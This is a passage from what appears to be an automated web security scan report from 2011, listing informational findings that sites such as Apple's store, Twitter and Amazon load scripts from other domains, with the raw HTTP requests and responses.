</noscript>

<script type="text/javascript" src="http://b.scorecardresearch.com/beacon.js"></script>
...[SNIP]...

19.108. http://qooxdoo.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qooxdoo.org
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: qooxdoo.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:05 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch11 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch11
Set-Cookie: DokuWiki=0fe5e502b58fb55e4cd7f270e6fe8676; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: DW79e26b637e697ad5a16041d830721ef8=deleted; expires=Wed, 03-Feb-2010 19:50:04 GMT; path=/
Set-Cookie: bb2_screener_=1296762605+173.193.214.243; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12782

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head profile="http://dublincore.org/documen
...[SNIP]...
</h2>
<script src="http://feeds2.feedburner.com/qooxdoo/news/content?format=sigpro" type="text/javascript"> </script>
...[SNIP]...
</div>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

19.109. http://search-cube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search-cube.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: search-cube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 31 Oct 2008 11:54:37 GMT
Accept-Ranges: bytes
ETag: "80ae6724f3bc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:35:33 GMT
Connection: close
Content-Length: 21024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

   <title>search-cube - the Visual Search Engine</title>
   <meta name="keywords" content="search engine, Flash applicat
...[SNIP]...
</script>
<script src="http://www.google.com/jsapi?key=ABQIAAAA1WfgpXm-avYbNdID1eOYwBSsShsxsmcnAguUyljTrbD6t6JU5hTrH7PXn8A3GlDa3u2MUXF4zhUeyg" type="text/javascript"></script>
...[SNIP]...
<!-- Google Analytics -->
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

19.110. http://shopping.yahoo.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.yahoo.com
Path:   /search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /search HTTP/1.1
Host: shopping.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:33:43 GMT
Set-Cookie: B=fcqcce56km497&b=3&s=rv; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 27398

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<link rel="stylesheet" href="http://l.yimg.com/a/combo?yui/2.7.0/build/reset-fonts-grids/reset
...[SNIP]...
</div>
<script charset="utf-8" type="text/javascript" src="http://l.yimg.com/kx/uh/js/uh2_rsa_r3267.js"></script>
...[SNIP]...
<!-- #postdoc -->

<script type="text/javascript" src="http://l.yimg.com/a/combo?yui/2.7.0/build/yahoo-dom-event/yahoo-dom-event.js&yui/2.7.0/build/imageloader/imageloader-min.js&shop/s2/sh_global_201002251741.js&shop/s2/sh_listing_201010132254.js"></script>
...[SNIP]...

19.111. http://store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /1-800-MY-APPLE/WebObjects/AppleStore.woa/wa/RSLID?nnmm=acct&sf=wHF2F2PHCCCX72KDY HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 Apple
Date: Thu, 03 Feb 2011 18:10:26 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
set-cookie: wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
set-cookie: woinst=920064012; path=/1-800-MY-APPLE/WebObjects/AppleStore.woa;
last-modified: Thu, 03 Feb 2011 10:11:02 GMT
cache-control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
expires: Tue, 02 Feb 2010 10:11:02 GMT
pragma: no-cache
vary: *
connection: close
content-length: 7059
Content-Type: text/html; charset=ISO-8859-1
x-frame-options: sameorigin

<!DOCTYPE html PUBLIC "-//W3C//HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<title>The Apple Store (U.S.)</title>
<meta name="viewpo
...[SNIP]...
PPLE/WebObjects/AppleStore.woa/920064012/sr/us/css/p/print.css" />


<script src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/1-800-MY-APPLE/WebObjects/AppleStore.woa/920064012/sr/us/js/javascripts-library.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://a248.e.akamai.net/7/248/2041/1806/store.apple.com/rs/js/metrics/s_code_h.js" type="text/javascript"></script>
...[SNIP]...

19.112. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /Catalog/US/Images/intlstoreroutingpage.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Catalog/US/Images/intlstoreroutingpage.html HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:10:23 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Last-Modified: Tue, 26 Oct 2010 18:00:52 GMT
ETag: "15decf-2490-4cc71754"
Accept-Ranges: bytes
Content-Length: 9360
Keep-Alive: timeout=360, max=99992
Connection: Keep-Alive
Content-Type: text/html
x-frame-options: sameorigin

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=macintosh">

...[SNIP]...
</script>
<script src="http://a248.e.akamai.net/7/248/2041/1564/store.apple.com/rs1/js/metrics/s_code_h.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://a248.e.akamai.net/7/248/2041/1554/store.apple.com/rs1/js/coherent/release/coherent.js" type="text/javascript"></script>
...[SNIP]...

19.113. https://store.apple.com/us/sign_in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /us/sign_in

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/sign_in?c=f63ef1babc027e38d46ff1531c1e3f73&r=SXYD4UDAPXU7P7KXF&s=ba6fdbd16f511f7872ee65ac03f444f3&t=SXYD4UDAPXU7P7KXF HTTP/1.1
Host: store.apple.com
Connection: keep-alive
Referer: http://store.apple.com/us/cart?mco=MTA4NTI1NTY
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:55:50 GMT
Cache-Control: no-store, private, must-revalidate, proxy-revalidate, max-age=0, pre-check=0, post-check=0, no-cache
Expires: Wed, 02 Feb 2011 17:55:50 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: *
pragma: no-cache
Date: Thu, 03 Feb 2011 17:55:50 GMT
x-request-id: fa9094e7-5e38-4e67-a544-4b0a139b3610
Cteonnt-Length: 14397
x-frame-options: sameorigin
Content-Length: 14397

<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />
   <meta name="robots" content="noindex, nofollow"/>
   
<title>Apple Online Store - Apple Stor
...[SNIP]...
<![endif]-->


<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/bootstrap/release/bootstrap.js"></script>


<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/coherent/release/coherent.js"></script>

<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/apple.js"></script>
...[SNIP]...
</script>
       
       <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/chat.js"></script>
   

   <link rel="stylesheet" href="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/css/applestore-print.css" media="print" />
   <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/checkout.js"></script>
   <script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/account.js"></script>
...[SNIP]...
</script>

<script src="https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/metrics/s_code_h.js"></script>
...[SNIP]...

19.114. http://training.apple.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://training.apple.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: training.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:53:41 GMT
ETag: "4d487409-7ddb-98898"
Last-Modified: Tue, 01 Feb 2011 20:58:49 GMT
Content-Type: text/html
Content-Length: 32219
MS-Author-Via: DAV
Connection: close

<!DOCTYPE html>
<html lang="en-US">
<head>

   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">

   <title>Apple - Training and Certification</title>

   <meta http-equiv="pics-label" con
...[SNIP]...
</script>
   <script charset="utf-8" type="text/javascript" src="http://www.google-analytics.com/urchin.js"></script>
...[SNIP]...

19.115. http://twitter.com/supermedia  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /supermedia

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /supermedia HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:19:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296760753-13380-14514
ETag: "980457e03ec8c8ddfb67fd40ecd97bea"
Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT
X-Runtime: 0.01072
Content-Type: text/html; charset=utf-8
Content-Length: 50851
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com
Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296755102/javascripts/twitter.js?1296759126" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296755102/javascripts/lib/jquery.tipsy.min.js?1296759126" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296755102/javascripts/lib/gears_init.js?1296759126" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296755102/javascripts/lib/mustache.js?1296759126" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296755102/javascripts/geov1.js?1296759126" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296755102/javascripts/api.js?1296759126" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296755102/javascripts/lib/mustache.js?1296759126" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296755102/javascripts/dismissable.js?1296759126" type="text/javascript"></script>
...[SNIP]...

19.116. http://www.abc3340.com/Global/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abc3340.com
Path:   /Global/story.asp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Global/story.asp HTTP/1.1
Host: www.abc3340.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 410 Gone
Server: Microsoft-IIS/6.0
WN: IIS53
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
wn_vars: CACHE_DB
wn_vars: ItemDoesNotExist
X-Robots-Tag: noindex
X-Robots-Tag: noarchive
Content-Type: text/html; charset=utf-8
Content-Length: 41098
Expires: Thu, 03 Feb 2011 21:48:16 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 03 Feb 2011 21:48:16 GMT
Connection: close
Set-Cookie: ClientGroup=1; expires=Fri, 03-Feb-2012 05:00:00 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head>
<META http-equiv="Content-Type" content="text/html">
<title>Our Apolog
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/analytics/sdctag.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/globals.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/jq.js?ver=201011111600"></script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/container-e/core.js?ver=201011111600"></script>
<script type="text/javascript" language="JavaScript1.3" src="http://content.worldnow.com/global/tools/video/VideoFunctions.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WBMA.images.worldnow.com/interface/js/wnadmanager.js?ver=201011111600"></script>
<script type="text/javascript" src="http://WBMA.images.worldnow.com/interface/js/wnvideo.js?ver=201011111600"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/menu/menu.js?ver=201011111600"></script>
...[SNIP]...
<!--Page Include: HEAD--><script type="text/javascript" src="http://ftpcontent.worldnow.com/wbma/custom/custom.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://content.worldnow.com/global/interface/integration/thirdparty.js?ver=201011111600"></script>
...[SNIP]...
<!--END WNStoryUtils-->
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=xa-4bbcc485014c0ab2"></script>
...[SNIP]...

19.117. http://www.agame.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.agame.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.agame.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Vary: Accept-Encoding
Cache-Control: max-age=14400
Content-Type: text/html
Date: Thu, 03 Feb 2011 21:48:20 GMT
Expires: Fri, 04 Feb 2011 00:24:20 GMT
Connection: close
Last-Modified: Thu, 03 Feb 2011 20:24:20 GMT
Content-Length: 158082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.spilcdn.com/teens/9/spil.js"></script>
...[SNIP]...

19.118. http://www.allianz.com.au/car-insurance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.allianz.com.au
Path:   /car-insurance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /car-insurance/ HTTP/1.1
Host: www.allianz.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: (unknown)
Date: Thu, 03 Feb 2011 21:48:22 GMT
Last-Modified: Thu, 03 Feb 2011 21:48:21 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26781
Cache-control: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en-au" xml:lang="en-au" dir="ltr">
<head>

...[SNIP]...
<!-- Maxymiser --><script type="text/javascript" src="//maxymiser.hs.llnwd.net/o36/allianz/js/mmcore.js"></script>
...[SNIP]...
<!-- RT start --><script src="http://intelligence.dgmsearchlab.com/dcv4/jslib/sid0491_4.003.js" type="text/javascript"></script>
...[SNIP]...

19.119. http://www.amazon.com/s/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /s/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315


<html>
<head>


<meta http-equiv="content-type" content="tex
...[SNIP]...
</script>

<script type="text/javascript" src="http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-10089555225.js._V173906659_.js"></script>
...[SNIP]...

19.120. http://www.apple.com/buy/locator/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /buy/locator/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /buy/locator/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
